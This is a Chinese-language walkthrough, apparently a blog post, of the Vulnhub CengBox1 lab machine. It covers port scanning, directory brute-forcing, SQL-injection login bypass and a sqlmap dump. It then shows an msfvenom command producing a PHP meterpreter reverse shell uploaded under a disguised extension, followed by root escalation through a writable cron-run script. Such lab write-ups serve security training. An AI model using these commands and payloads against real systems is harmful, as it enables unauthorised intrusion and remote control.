Vulnhub靶场实例

VULNHUB靶机 CENGBOX1

2022-01-27  本文已影响0人  doinb1517

题目描述

desc.png

官方连接

解题记录

Reconnaissance

使用namp扫描主机

nmap -sT 192.168.1.11
01.png

发现80和22端口开放,尝试访问

02.png

尝试目录爆破

dirsearch -u http://192.168.1.11
dirb http://192.168.1.11 /usr/share/wordlists/dirb/big.txt

扫描出以下几个

http://192.168.1.11/masteradmin
http://192.168.1.11/index.php

直接访问http://192.168.1.11/masteradmin显示403继续扫描该目录下的php后缀的文件

http://192.168.1.11/masteradmin/login.php
http://192.168.1.11/masteradmin/upload.php

访问http://192.168.1.11/masteradmin/login.php,发现登录页面

loginin.png

Execution

直接尝试一下sql注入,直接进入上传页面。再使用sqlmap查看数据库名

login_burp.png
sqlmap -r login.txt --dbs 
dbs.png

爆破表

sqlmap -r login.txt -D cengbox --dump
table.png

继续回到上传页面,上传一个php一句话木马,失败,页面左上角有提示,这个提示的颜色和背景色很像,不注意根本看不到,根据提示修改后缀为.ceng上传。

upload_err.png

生成payload,上传成功。

 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -o re_shell.ceng
upload_success.png

获取shell,发现用户cengover,使用数据库中发现的密码连接

get_shell.png find_user.png

尝试连接


cengover.png

发现cengover的flag

cengflag.png

Privilege Escalation

使用pspy提权, Github

pspy.png

找到一个可用的

MD5.png

查看该文件的读写权限,

ls.png

生成反弹shell,写入/opt/md5check.py

msfvenom.png

msfconsole等待连接即可,得到root权限

root.png
上一篇 下一篇

猜你喜欢

热点阅读